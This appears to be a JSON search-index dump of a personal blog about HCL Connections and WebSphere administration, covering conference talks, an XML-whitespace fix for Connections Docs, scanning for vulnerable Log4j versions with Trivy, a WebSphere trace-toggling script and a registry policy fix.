target=\"_blank\"\u003ehttps://dnug.de/dachnug49/ \u003ci class=\"las la-external-link-alt la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\n \u003ca href=\"#dachnug49----httpsdnugdedachnug49\"\u003e\u003ci class=\"las la-link la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\u003c/h2\u003e\n\n\u003cul\u003e\n\u003cli\u003e\n\u003cspan\u003e\n \u003ca class=\"text-decoration-none\" href=\"https://share.stoeps.de/dachnug49-admintoolbox.html\" target=\"_blank\"\u003eHCL Connections Admin Toolbox \u003ci class=\"las la-external-link-alt la-xs\"\u003e\u003c/i\u003e\n \u003ci class=\"lab la-html5 la-2x align-middle\"\u003e\u003c/i\u003e\n \n \n \n \u003cimg class=\"align-middle stoeps-presentation\" src=\"/images/united-kingdom.png\"/\u003e\n \u003c/a\u003e\n\u003c/span\u003e\n\u003c/li\u003e\n\u003c/ul\u003e\n\u003ciframe width=\"1024\" height=\"576\" marginheight=\"0\" marginwidth=\"0\" src=\"https://share.stoeps.de/dachnug49-admintoolbox.html\"\u003e\n Your browser does not support this, go to the presentation directly: [HCL Connections Admin Toolbox](https://share.stoeps.de/dachnug49-admintoolbox.html)\n\u003c/iframe\u003e\n\u003chr\u003e\n\u003ch2 id=\"froscon----httpsfrosconorg\"\u003eFroscon \u0026ndash; \u003ca href=\"https://froscon.org\" target=\"_blank\"\u003ehttps://froscon.org \u003ci class=\"las la-external-link-alt la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\n \u003ca href=\"#froscon----httpsfrosconorg\"\u003e\u003ci class=\"las la-link la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\u003c/h2\u003e\n\n\u003ch3 id=\"checkliste-fuer-universaldilettanten\"\u003eCheckliste fuer Universaldilettanten \u003ca href=\"#checkliste-fuer-universaldilettanten\"\u003e\u003ci class=\"las la-link la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\u003c/h3\u003e\n\n\u003cul\u003e\n\u003cli\u003e\n\u003cp\u003egemeinsam mit \u003ca href=\"https://martin.leyrer.priv.at\" target=\"_blank\"\u003eMartin Leyrer \u003ci class=\"las la-external-link-alt la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\n\u003c/p\u003e\n\u003c/li\u003e\n\u003cli\u003e\n\n\u003cspan\u003e\n \u003ca class=\"text-decoration-none\" href=\"https://share.stoeps.de/2022-08%20FrOSCon%20-%20Checkliste%20f%c3%bcr%20Universal-dilettanten.pdf\" target=\"_blank\"\u003eCheckliste fuer Universaldilettanten \u003ci class=\"las la-external-link-alt la-xs\"\u003e\u003c/i\u003e\n \n \u003ci class=\"las la-file-pdf la-2x align-middle\"\u003e\u003c/i\u003e\n \n \u003cimg class=\"align-middle stoeps-presentation\" src=\"/images/germany.png\"/\u003e\n \n \u003c/a\u003e\n\u003c/span\u003e\n\n\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch4 id=\"video\"\u003eVideo \u003ca href=\"#video\"\u003e\u003ci class=\"las la-link la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\u003c/h4\u003e\n\n\u003ciframe width=\"1024\" height=\"576\" src=\"https://media.ccc.de/v/froscon2022-2791-checkliste_fur_universaldilettanten/oembed\" frameborder=\"0\" allowfullscreen\u003e\u003c/iframe\u003e\n\u003chr\u003e\n\u003ch3 id=\"troubleshooting-von-enterprise-web-applikationen-mit-open-source-tools\"\u003eTroubleshooting von Enterprise Web Applikationen mit Open Source Tools \u003ca href=\"#troubleshooting-von-enterprise-web-applikationen-mit-open-source-tools\"\u003e\u003ci class=\"las la-link la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\u003c/h3\u003e\n\n\u003cul\u003e\n\u003cli\u003e\n\u003cspan\u003e\n \u003ca class=\"text-decoration-none\" href=\"https://share.stoeps.de/froscon2022-oss-toolbox.html\" target=\"_blank\"\u003eTroubleshooting (Enterprise) Web Applikationen mit Open Source Tools \u003ci class=\"las la-external-link-alt la-xs\"\u003e\u003c/i\u003e\n \u003ci class=\"lab la-html5 la-2x align-middle\"\u003e\u003c/i\u003e\n \n \n \u003cimg class=\"align-middle stoeps-presentation\" src=\"/images/germany.png\"/\u003e\n \n \u003c/a\u003e\n\u003c/span\u003e\n\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch4 id=\"video-1\"\u003eVideo \u003ca href=\"#video-1\"\u003e\u003ci class=\"las la-link la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\u003c/h4\u003e\n\n\u003ciframe width=\"1024\" height=\"576\" src=\"https://media.ccc.de/v/froscon2022-2782-troubleshooting_enterprise_web_applikationen_mit_opensource_tools/oembed\" frameborder=\"0\" allowfullscreen\u003e\u003c/iframe\u003e\n\u003ch4 id=\"slides\"\u003eSlides \u003ca href=\"#slides\"\u003e\u003ci class=\"las la-link la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\u003c/h4\u003e\n\n\u003ciframe width=\"1024\" height=\"576\" marginheight=\"0\" marginwidth=\"0\" src=\"https://share.stoeps.de/froscon2022-oss-toolbox.html\"\u003e\n Your browser does not support this, go to the presentation directly: [Troubleshooting (Enterprise) Web Applikationen mit Open Source Tools](https://share.stoeps.de/froscon2022-oss-toolbox.html)\n\u003c/iframe\u003e","ref":"https://stoeps.de/speaking/2022/","title":"Talks 2022"},{"body":"","excerpt":"","ref":"https://stoeps.de/tags/code/","title":"Code"},{"body":"I installed HCL Connections Docs 2.0.1 on top of an already installed HCL Connections 6.5CR1 with Docs Viewer. Usually a simple task, the installation was smooth, after the mandatory restart the Edit button in the files\u0026rsquo; application appeared and all looked good, but when the users clicked on edit a white page was loaded.\nI checked the application itself starting with a version check on https://mydomain.tld/docs/version and the version was displayed.\nThe funny part was that the test environment installed with the same script ran flawlessly with the same settings. I had an issue with the hostname of the environment when we started with Invite. Invite didn\u0026rsquo;t understand the single sign on domain, because the hostname has only two parts domain.tld. Invite got a fix and works now, but the first thought was maybe the two part hostname was again involved, and the test environment uses test.domain.tld which worked in Invite too.\nThe SystemOut.log showed following message when a user tried to open a file in the editor.\nSome lines below there was an SSO error message with the domain.tld. So I still thought about the hostname. So I installed a new test environment to double-check that the issue is not hostname related. The test server deployment worked fine with a two part hostname \u0026hellip;\nBack to the production server I started comparing everything with test, the JSON files are stored in git, so I could compare line by line. I checked the whole IBMDocs-config-directory, no success. Docs still loads the white page.\nThe environment is running about 6 years now and was updated from 4.0 to 4.5 to 5.0 to 5.5 and finally 6.5. The 6.5CR1 ran nearly a year until I installed Docs on top (Viewer was installed since the beginning and updated to 2.0.1 during the 6.5CR1 deployment).\nSo I searched the whole Docs stuff, double-checked conversion which was moved to Linux during the 6.5 migration, checked access rights and so on. Enabled tracing but there was nothing in the trace.log which would explain the error message:\nNoSuchAlgorithmException sounded just weird. So I went through all documents about TLSv1.2 in the HCL documentation and knowledge base :\nForcing traffic to use TLS 1.2 Can\u0026rsquo;t create/edit document in Docs - Connections Some restarts later I just wanted to give up (which means opening a case with HCL), so I downloaded the git repository with all configs and started to put everything together. This time I had a look into LotusConnections-config.xml which looked somehow strange formatted.\n\u0026lt;sloc:serviceReference acf_config_file=\u0026#34;acp-configkey__stoeps.xml\u0026#34; bootstrapHost=\u0026#34;admin_replace\u0026#34; bootstrapPort=\u0026#34;admin_replace\u0026#34; clusterName=\u0026#34;Util\u0026#34; enabled=\u0026#34;true\u0026#34; serviceName=\u0026#34;rte\u0026#34; ssl_enabled=\u0026#34;true\u0026#34; \u0026gt; \u0026lt;sloc:href\u0026gt; \u0026lt;sloc:hrefPathPrefix\u0026gt;/connections/rte\u0026lt;/sloc:hrefPathPrefix\u0026gt; \u0026lt;sloc:static href=\u0026#34;http://cnx7-was.stoeps.home\u0026#34; ssl_href=\u0026#34;https://cnx7-was.stoeps.home\u0026#34; /\u0026gt; \u0026lt;sloc:interService href=\u0026#34;https://cnx7-was.stoeps.home\u0026#34; /\u0026gt; \u0026lt;/sloc:href\u0026gt; \u0026lt;/sloc:serviceReference\u0026gt; There were way more line breaks than I would have expected.\nNormally the xml looks like this:\n\u0026lt;sloc:serviceReference acf_config_file=\u0026#34;acp-configkey__stoeps.xml\u0026#34; bootstrapHost=\u0026#34;admin_replace\u0026#34; bootstrapPort=\u0026#34;admin_replace\u0026#34; clusterName=\u0026#34;Util\u0026#34; enabled=\u0026#34;true\u0026#34; serviceName=\u0026#34;rte\u0026#34; ssl_enabled=\u0026#34;true\u0026#34;\u0026gt; \u0026lt;sloc:href\u0026gt; \u0026lt;sloc:hrefPathPrefix\u0026gt;/connections/rte\u0026lt;/sloc:hrefPathPrefix\u0026gt; \u0026lt;sloc:static href=\u0026#34;http://cnx7-was.stoeps.home\u0026#34; ssl_href=\u0026#34;https://cnx7-was.stoeps.home\u0026#34; /\u0026gt; \u0026lt;sloc:interService href=\u0026#34;https://cnx7-was.stoeps.home\u0026#34; /\u0026gt; \u0026lt;/sloc:href\u0026gt; \u0026lt;/sloc:serviceReference\u0026gt; And the end of the file (genericProperty section):\n\u0026lt;genericProperty name=\u0026#34;com.ibm.connections.SSLProtocol\u0026#34;\u0026gt; TLSv1.2 \u0026lt;/genericProperty\u0026gt; \u0026lt;genericProperty name=\u0026#34;icec.light\u0026#34;\u0026gt; true \u0026lt;/genericProperty\u0026gt; Weird, but still the xmllint tool showed the file is valid XML (check in and out validated the XML too), and all Connections and Docs Viewer are working without any issue, but the formatting remembered me about the TLSv1.2 message in SystemOut.log.\nSo I gave it a try and reformatted the XML, so all whitespace was removed.\n\u0026lt;genericProperty name=\u0026#34;com.ibm.connections.SSLProtocol\u0026#34;\u0026gt;TLSv1.2\u0026lt;/genericProperty\u0026gt; \u0026lt;genericProperty name=\u0026#34;icec.light\u0026#34;\u0026gt;true\u0026lt;/genericProperty\u0026gt; I synchronized the nodes and restarted all application servers to be sure that the new configuration was loaded. The Docs-Server now showed this message on startup:\nWow! No line break or algorithm exception.\nI opened Files \u0026gt; Edit document and Docs loads the document and all looks good now. So for me, it looks like that Docs does not ignore Whitespace in the XML configuration and all other applications do.\nSummary I checked the git history when the XML was reformatted, and it was already there in 5.5, maybe earlier. I edit everything in VIM and I haven\u0026rsquo;t enabled linting or automatic code format there, but sometimes I have to use VS Code and I found that some XML add-ons format XML on save and there are settings which move attributes to new lines. So I suspect that this happened years ago, someone edited with Code (or something similar) and on save the code was reformatted, as no error appeared, the change was committed.\nLessons I learned Always check LotusConnections-config.xml when an application shows an error. They all read base configuration from there. This is BTW the reason that you have to restart all Connections\u0026rsquo; application after changing LotusConnections-config.xml.\nSecond, when you use a two part hostname in production, then use a two part hostname for your test environment too!\n","excerpt":"\u003cp\u003eI installed HCL Connections Docs 2.0.1 on top of an already installed HCL Connections 6.5CR1 with Docs Viewer. Usually a simple task, the installation was smooth, after the mandatory restart the \u003ccode\u003eEdit\u003c/code\u003e button in the files\u0026rsquo; application appeared and all looked good, but when the users clicked on \u003ccode\u003eedit\u003c/code\u003e a white page was loaded.\u003c/p\u003e","ref":"https://stoeps.de/posts/2021/connections_docs_tls_and_xml/","title":"Connections Docs, TLSv1.2 and XML Format"},{"body":"","excerpt":"","ref":"https://stoeps.de/keywords/docs/","title":"Docs"},{"body":"","excerpt":"","ref":"https://stoeps.de/tags/highlight/","title":"Highlight"},{"body":"","excerpt":"","ref":"https://stoeps.de/tags/lcc/","title":"Lcc"},{"body":"","excerpt":"","ref":"https://stoeps.de/keywords/lint/","title":"Lint"},{"body":"","excerpt":"","ref":"https://stoeps.de/tags/validation/","title":"Validation"},{"body":"","excerpt":"","ref":"https://stoeps.de/tags/xml/","title":"Xml"},{"body":"","excerpt":"","ref":"https://stoeps.de/keywords/xml/","title":"Xml"},{"body":"","excerpt":"","ref":"https://stoeps.de/keywords/cve/","title":"Cve"},{"body":"","excerpt":"","ref":"https://stoeps.de/tags/cve-2021-44228/","title":"Cve-2021-44228"},{"body":"","excerpt":"","ref":"https://stoeps.de/tags/log4j/","title":"Log4j"},{"body":"","excerpt":"","ref":"https://stoeps.de/keywords/log4j/","title":"Log4j"},{"body":"Update 2021-12-13 2021-12-15\nElasticsearch: Apache Log4j2 Remote Code Execution (RCE) Vulnerability - CVE-2021-44228 - ESA-2021-31 HCL: CVE-2021-44228 : Security Advisory IBM: Security Bulletin: Vulnerability in Apache Log4j affects WebSphere Application Server (CVE-2021-44228) Security Bulletin: HCL Connections Security Update for Apache Log4j 2 Vulnerability (CVE-2021-44228) CVE-2021-45046: It was found that the fix to address CVE-2021-44228 in Apache Log4j 2.15.0 was incomplete in certain non-default configurations. So there is a fix for kc.war which updates the log4j 2.8 to 2.15, Elasticsearch in Component Pack has log4j 2.8 and 2.11 included but is not vulnerable because of additional security settings.\nThere are additional security layers in the Component Pack Elasticsearch, like SearchGuard , but the advisory for Elasticsearch tells clearly you should update.\nOriginal post Yesterday several security advisories arrived in my Inbox and people were worried about a 0-day vulnerability in Apache Log4j .\nI read a lot during the last 24 hours and searched for log4j versions within HCL Connections. I wanted to write about some of these commands already since weeks, so I use the awareness to show you some fast options to scan all packages in container images, file system and registries. For me one of the hardest points was to find out, if the software is using log4j and which version.\nAs far as I know, only the Help.ear has a log4j 2.3 included, so you have two options, stop it and wait for a fix, or add the JVM option to your cluster remove the class from the jar.\nIn my test installation I couldn\u0026rsquo;t find it, so maybe an add-on installed it in other environments.\nSo the used version log4j-2.3 is not secured with the JVM option log4j2.formatMsgNoLookups! You have to stop the Help application until a fix is available, or remove the JndiLookup.class from the jar file.\nFinally, HCL released a Security Advisory with workarounds.\nMitigation: In releases \u0026gt;=2.10, this behavior can be mitigated by setting either the system property log4j2.formatMsgNoLookups or the environment variable LOG4J_FORMAT_MSG_NO_LOOKUPS to true. For releases from 2.0-beta9 to 2.10.0, the mitigation is to remove the JndiLookup class from the classpath:\nzip -q -d log4j-core-*.jar org/apache/logging/log4j/core/lookup/JndiLookup.class\nHCL Support: CVE-2021-44228 : Security Advisory But without such advisory, how can we detect if our systems uses the vulnerable library?\nHCL License files When you want to know if HCL Connections has log4j included, you check the license files.\nWithin the Connections\u0026rsquo; installation folder you find the HCL and non-HCL licenses of the installed products. So we can grep for log4j there:\ncd /opt/HCL/Connections/lafiles grep log4j * notices:log4j.settings_1.0.0.20200928-1215.jar\tnotices:log4j-1.2.11.jar\tThe Apache Software Foundation ... So in notices we see the licenses and version numbers of all Open Source libraries of Connections.\nLinux find Next option is to search for the jar files within the file system. In my case, I started on the WebSphere Application server and scanned the installedApps folder.\n[root@cnx7-was ~]# cd /opt/IBM/WebSphere/AppServer/profiles/AppSrv01/installedApps/ConnectionsCell/ [root@cnx7-was ConnectionsCell]# find . -iname \\*log4j\\* | grep jar | sort ./Activities.ear/oawebui.war/WEB-INF/lib/log4j-1.2.11.jar ./Blogs.ear/blogs.war/WEB-INF/lib/log4j-1.2.11.jar ... File system scanning like here is easy, when you just want to find a library or the used version.\nTrivy A good option for scanning all kinds of vulnerabilities in the file system and within containers is Aquasecurity Trivy licensed under the Apache 2.0 License .\nContainer For HCL Connections, we get all container images of Component Pack within the download package. Here for example, I extracted it to my local file system:\nunzip componentpack-7.0.0.2.zip cd microservices_connections/hybridcloud/images/ mkdir logs for i in $(ls) ; do trivy i -i ${i} -o logs/${i%.tar}.log done This command creates a log-file for each image in the directory and lists all used libraries and their known vulnerabilities.\nSo now we can grep for log4j and will find the Elasticsearch images, which uses log4j-2.11.1.\nI\u0026rsquo;m not sure if a user can trigger something in Componentpack - Elasticsearch, but I edited the statefulsets es-master-7, es-data-7 and the deployment es-client-7. I just added the mentioned JVM option and restarted the pods.\nkubectl edit statefulset es-master-7 kubectl edit statefulset es-data-7 kubectl edit deployment es-client-7 Each of the definitions shows ES_JAVA_OPTS twice:\n- name: ES_JAVA_OPTS value: -Xms512m -Xmx512m in both occurrences add -Dlog4j2.formatMsgNoLookups=True - name: ES_JAVA_OPTS value: -Xms512m -Xmx512m -Dlog4j2.formatMsgNoLookups=True and restart the pods: kubectl rollout restart statefulsets es-data-7 es-master-7 kubectl rollout restart deployment es-client-7 After this check if all applications in Connections are still working, or restart them too.\nFiles System We can use trivy to scan the ear files:\ncd /opt/IBM/WebSphere/AppServer/profiles/AppSrv01/installedApps/ConnectionsCell/ mkdir ~/logs for i in $(ls) ; do trivy fs --list-all-pkgs -o ~/logs/${i%%.ear}.log $i done This creates a directory named logs in our home directory, and we can read over all files, or just grep for terms you\u0026rsquo;re interested in.\nYou will see, we get the library name, installed version and if there is a version available where the issue is fixed.\nI don\u0026rsquo;t post any found libraries here, there is a lot to observe and not each critical vulnerability is exploitable in all environments. So you have to read the follow-ups under title and find out if your environment is vulnerable.\nRegistry Trivy can scan images in registries too, I do more like the scanning in the file system, because there I don\u0026rsquo;t need to tame certificates and download the image before.\nSummary I like using trivy, and I learned a lot about containers and libraries since I use it. You can add it to your CI/CD, and development workflow, this can help update libraries more frequently.\nResources https://support.hcltechsw.com/csm?id=kb_article\u0026sysparm_article=KB0095490 https://nvd.nist.gov/vuln/detail/CVE-2021-44228 https://www.randori.com/blog/cve-2021-44228/ https://github.com/apache/logging-log4j2/pull/608 Other Open Source Tools to scan for libraries in file systems and multi jar levels ","excerpt":"\u003cp\u003e\u003cstrong\u003eUpdate \u003cdel\u003e2021-12-13\u003c/del\u003e 2021-12-15\u003c/strong\u003e\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://discuss.elastic.co/t/apache-log4j2-remote-code-execution-rce-vulnerability-cve-2021-44228-esa-2021-31/291476\" target=\"_blank\"\u003eElasticsearch: Apache Log4j2 Remote Code Execution (RCE) Vulnerability - CVE-2021-44228 - ESA-2021-31 \u003ci class=\"las la-external-link-alt la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\n\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://support.hcltechsw.com/csm?id=kb_article\u0026amp;sysparm_article=KB0095490\" target=\"_blank\"\u003eHCL: CVE-2021-44228 : Security Advisory \u003ci class=\"las la-external-link-alt la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\n\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://www.ibm.com/support/pages/node/6525706?myns=swgws\u0026amp;mynp=OCSSEQTP\u0026amp;mync=E\u0026amp;cm_sp=swgws-_-OCSSEQTP-_-E\" target=\"_blank\"\u003eIBM: Security Bulletin: Vulnerability in Apache Log4j affects WebSphere Application Server (CVE-2021-44228) \u003ci class=\"las la-external-link-alt la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\n\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://support.hcltechsw.com/csm?id=kb_article\u0026amp;sysparm_article=KB0095498\" target=\"_blank\"\u003eSecurity Bulletin: HCL Connections Security Update for Apache Log4j 2 Vulnerability (CVE-2021-44228) \u003ci class=\"las la-external-link-alt la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\n\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-45046\" target=\"_blank\"\u003eCVE-2021-45046: It was found that the fix to address CVE-2021-44228 in Apache Log4j 2.15.0 was incomplete in certain non-default configurations. \u003ci class=\"las la-external-link-alt la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\n\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003eSo there is a fix for \u003ccode\u003ekc.war\u003c/code\u003e which updates the \u003ccode\u003elog4j\u003c/code\u003e 2.8 to 2.15, Elasticsearch in Component Pack has log4j 2.8 and 2.11 included \u003cdel\u003ebut is not vulnerable because of additional security settings.\u003c/del\u003e\u003c/p\u003e","ref":"https://stoeps.de/posts/2021/log4j_how_to_find_out/","title":"Log4j how to find out if an application has it included"},{"body":"","excerpt":"","ref":"https://stoeps.de/tags/log4shell/","title":"Log4shell"},{"body":"","excerpt":"","ref":"https://stoeps.de/keywords/log4shell/","title":"Log4shell"},{"body":"","excerpt":"","ref":"https://stoeps.de/categories/security/","title":"Security"},{"body":"","excerpt":"","ref":"https://stoeps.de/tags/vulnerabilities/","title":"Vulnerabilities"},{"body":"","excerpt":"","ref":"https://stoeps.de/keywords/debug/","title":"Debug"},{"body":"","excerpt":"","ref":"https://stoeps.de/tags/debugging/","title":"Debugging"},{"body":"During troubleshooting of WebSphere Application Server it is necessary to enable traces and see more detailed log messages.\nEnabling these traces is very annoying, because you need to follow long click paths within the Integrated Solution Console (ISC).\nEnable traces within ISC Open WebSphere Application servers overview, click the server name where you want to enable traces Click on Diagnostic trace service Click on Runtime Most of the time it is sufficient to enable traces for the runtime of the application server. So no need to restart the application server, after restart the trace settings are set back to default.\nOpen Change log detail level Add the trace string to text box and click OK or Apply So after 6 or 7 clicks you\u0026rsquo;re ready to \u0026hellip;\ndo the same on the next application server, if you have multiple WebSphere nodes for this environment.\nAfter reproducing the error, you can go the same way and set the text box back to *=info or restart the application server to remove the trace settings. Traces produce a lot of IO and so the performance can be very low during activated trace settings. Disable them as soon as possible.\nEnable and disable traces with wsadmin.sh I found a script to print the cluster members of a WebSphere Cluster and extended it with the documented steps to enable tracing on running WebSphere application servers .\nFollowing script enables traces when you start it with two parameters (Cluster name and the trace string) and disables all traces when it is started with one parameter (Cluster name).\n\u0026#39;\u0026#39;\u0026#39; Enable / disable trace settings for all cluster members Cluster name is passed as first parameter to the script Tracestring is passed as second parameter if Tracestring is empty -\u0026gt; disable trace author: Christoph Stoettner mail: christoph.stoettner@stoeps.de license: Apache 2.0 \u0026#39;\u0026#39;\u0026#39; import sys if len(sys.argv) == 0: print(\u0026#39;\u0026#39;\u0026#39; \\tScript needs at least one parameter: Clustername \\n\\tWhen a second parameter is used, it is interpreted as trace string \\n\\n\\tExample: \\twsadmin.sh -lang jython -f clusterTrace.py InfraCluster \u0026#34;*=info:com.ibm.lconn.news.*=all:com.ibm.lconn.hpnews.*=all\u0026#34; \u0026#39;\u0026#39;\u0026#39;) sys.exit() elif len(sys.argv) == 1: type = \u0026#39;disabled\u0026#39; cluster_name=sys.argv[0] else: cluster_name=sys.argv[0] traces=sys.argv[1] type = \u0026#39;enabled\u0026#39; if type == \u0026#39;enabled\u0026#39;: trace_string=\u0026#39;\u0026#39; for trace in traces.split(\u0026#39;:\u0026#39;): if trace_string==\u0026#39;\u0026#39;: trace_string=trace + \u0026#39;=\u0026#39; + type else: trace_string=trace_string + \u0026#39;:\u0026#39; + trace + \u0026#39;=\u0026#39; + type else: trace_string=\u0026#39;*=info=enabled\u0026#39; cluster_id = AdminConfig.getid(\u0026#34;/ServerCluster:\u0026#34;+cluster_name+\u0026#34;/\u0026#34;) if not cluster_id: raise \u0026#34;Cluster %s does not exist!\u0026#34; % cluster_name member_ids = AdminConfig.showAttribute(cluster_id, \u0026#34;members\u0026#34;) member_ids = member_ids[1:-1] for member_id in member_ids.split(): member_name=AdminConfig.showAttribute(member_id, \u0026#34;memberName\u0026#34;) node_name=AdminConfig.showAttribute(member_id, \u0026#34;nodeName\u0026#34;) # Get TraceServer ID ts=AdminControl.completeObjectName(\u0026#39;type=TraceService,process=\u0026#39;+member_name+\u0026#39;,*\u0026#39;) # Set trace settings try: AdminControl.setAttribute(ts, \u0026#39;traceSpecification\u0026#39;, trace_string) print(\u0026#34;Successfully \u0026#34; + type + \u0026#34; trace on \u0026#34; + node_name + \u0026#39;/\u0026#39; + member_name) except: print(\u0026#34;Error changing trace on \u0026#34; + node_name + \u0026#39;/\u0026#39; + member_name) So to enable the trace string *=info:com.ibm.lconn.news.*=all:com.ibm.lconn.core.services.*=all:com.ibm.lconn.hpnews.*=all on the InfraCluster, run the following command:\nThe following commands expect, that you copied the script in the bin folder within your Deployment Manager profile. cd /opt/IBM/WebSphere/AppServer/profiles/Dmgr01/bin ./wsadmin.sh -lang jython -f clusterTrace.py InfraCluster \u0026#34;*=info:com.ibm.lconn.news.*=all:com.ibm.lconn.core.services.*=all:com.ibm.lconn.hpnews.*=all\u0026#34; Now do whatever needs to be done to reproduce your issue.\nTo disable the trace on the InfraCluster, run:\ncd /opt/IBM/WebSphere/AppServer/profiles/Dmgr01/bin ./wsadmin.sh -lang jython -f clusterTrace.py InfraCluster Even when the performance of the frontend lags during the activated trace, you can disable it with wsadmin nearly immediately. This saves you time, disk space and several meters of mouse movement.\nResources Download clusterTrace.py Tracing operations using the wsadmin scripting tool Turning traces on and off in servers processes using scripting WebSphere Administration: Finding Cluster Members ","excerpt":"\u003cp\u003eDuring troubleshooting of WebSphere Application Server it is necessary to enable traces and see more detailed log messages.\u003c/p\u003e\n\u003cp\u003eEnabling these traces is very annoying, because you need to follow long click paths within the Integrated Solution Console (ISC).\u003c/p\u003e","ref":"https://stoeps.de/posts/2021/websphere_traces_on_steroids/","title":"Enabling and disabling WebSphere traces on steroids"},{"body":"","excerpt":"","ref":"https://stoeps.de/categories/ibm-software/","title":"IBM Software"},{"body":"","excerpt":"","ref":"https://stoeps.de/tags/traces/","title":"Traces"},{"body":"","excerpt":"","ref":"https://stoeps.de/keywords/websphere/","title":"Websphere"},{"body":"","excerpt":"","ref":"https://stoeps.de/tags/websphere/","title":"WebSphere"},{"body":"During the latest automated deployment of the HCL Connections Desktop Plug-ins for Microsoft™ Windows™ , I had issues activating the Password Save Policy. We wanted to disable the option that users can save passwords.\nThe documentation tells us, that the registry key HKLM\\SOFTWARE\\Wow6432Node\\IBM\\Social Connectors\\Settings\\Password Save Policy needs to be set to 1 to achieve this.\nSadly this does not work, and I remembered, that I investigated this error already some years ago.\nSetting Password Policy like the documentation describes it The Remember the password checkbox is still active.\nAdministrative Template File ADM When you install the plugins you will find two .adm files to import into the Windows Group Policy editor. For 64-bit Windows use C:\\Program Files (x86)\\HCL\\Connections Desktop Plugins\\IBMConnections64.adm, for the 32-bit version, you need to import C:\\Program Files (x86)\\HCL\\Connections Desktop Plugins\\IBMConnections64.adm. So I checked this file for 64 bit and found the registry key: HKLM\\SOFTWARE\\Wow6432Node\\IBM\\Social Connectors\\Servers\\Password Save Policy.\nSo there is an additional string Servers in the path.\n229 230 231 232 233 234 235 236 ; Password Save Policy POLICY !!L_PasswordSavePolicy KEYNAME \u0026#34;SOFTWARE\\Wow6432Node\\IBM\\Social Connectors\\Servers\u0026#34; EXPLAIN !!L_PasswordSavePolicyExplain VALUENAME \u0026#34;Password Save Policy\u0026#34; VALUEON 1 VALUEOFF 0 END POLICY When you set the key in the subfolder Servers it works and the password option is grayed out.\nSave password grayed out, after using the path documented in ADM I sent this to support under ticket number CS0255086, that the documentation needs an update. After waiting three months, I make a note here to keep this in mind and not forget it again. Resources HCL Connections Desktop Plug-ins for Microsoft™ Windows™ Preferences and policies for the HCL Connections Desktop Plug-ins for Microsoft Windows ","excerpt":"\u003cp\u003eDuring the latest automated deployment of the \u003ca href=\"https://help.hcltechsw.com/connections/v7/connectors/enduser/c_files_window_install_ovr.html\" target=\"_blank\"\u003eHCL Connections Desktop Plug-ins for Microsoft™ Windows™ \u003ci class=\"las la-external-link-alt la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\n, I had issues activating the \u003ccode\u003ePassword Save Policy\u003c/code\u003e. We wanted to disable the option that users can save passwords.\u003c/p\u003e\n\u003cp\u003eThe documentation tells us, that the registry key \u003ccode\u003eHKLM\\SOFTWARE\\Wow6432Node\\IBM\\Social Connectors\\Settings\\Password Save Policy\u003c/code\u003e needs to be set to \u003ccode\u003e1\u003c/code\u003e to achieve this.\u003c/p\u003e","ref":"https://stoeps.de/posts/2021/connections_desktop_plugins_password_save_policy/","title":"Connections Desktop Plugins Password Save Policy"},{"body":"","excerpt":"","ref":"https://stoeps.de/tags/plugins/","title":"Plugins"},{"body":"","excerpt":"","ref":"https://stoeps.de/tags/registry/","title":"Registry"},{"body":"","excerpt":"","ref":"https://stoeps.de/tags/community/","title":"Community"},{"body":"","excerpt":"","ref":"https://stoeps.de/keywords/community/","title":"Community"},{"body":"","excerpt":"","ref":"https://stoeps.de/tags/creator/","title":"Creator"},{"body":"","excerpt":"","ref":"https://stoeps.de/keywords/creator/","title":"Creator"},{"body":"","excerpt":"","ref":"https://stoeps.de/keywords/hcl-connections/","title":"Hcl-Connections"},{"body":"","excerpt":"","ref":"https://stoeps.de/tags/hide/","title":"Hide"},{"body":"Some time ago I got the tip from HCL Support, that the Create Community button will recognize the role community-creator only when the gatekeeper option CATALOG_CARD_UPDATED is set to false.\nThis is working, but I had to complain, that this option activates some code, which loads fonts from a CDN instead of the local Connections deployment.\nFor some customers external download of code, fonts, or styles is an issue and this was already fixed with CATALOG_CARD_UPDATED=true, so I was very surprised, as users complained again, that the Community catalog page is requesting fonts from CDN.\nFinally, HCL offered to add the functionality, that the community create button is only visible when the user has the role Community-creator when CATALOG_CARD_UPDATED is set to true, HCL wrote some more details in the defect article KB0088295 .\nSo when you want fonts only loaded from on premises resources and have a hidden / shown create community button, then you should switch back to CATALOG_CARD_UPDATED=true, after you installed the CFix.70.2110 or the upcoming CFix.65.2111 .\nWhy is loading fonts from CDN not a good idea? A very good summary about this topic was written by Collin M Barret in his article Blocking Web Fonts for Speed and Privacy and there is nothing to add.\nIt is less a security issue, because there were only view vulnerabilities in the context of external web fonts, but we shouldn\u0026rsquo;t forget the privacy concerns. Please read the article for more details.\nResources Defect article KB0088295 Fix list Connections 7 Fix list Connections 6.5 Overview Connections defect articles Blocking Web Fonts for Speed and Privacy ","excerpt":"\u003cp\u003eSome time ago I got the tip from HCL Support, that the \u003ca href=\"https://stoeps.de/posts/2020/community_create_button/\"\u003e\u003ccode\u003eCreate Community\u003c/code\u003e button will recognize the role \u003ccode\u003ecommunity-creator\u003c/code\u003e\u003c/a\u003e\n only when the gatekeeper option \u003ccode\u003eCATALOG_CARD_UPDATED\u003c/code\u003e is set to 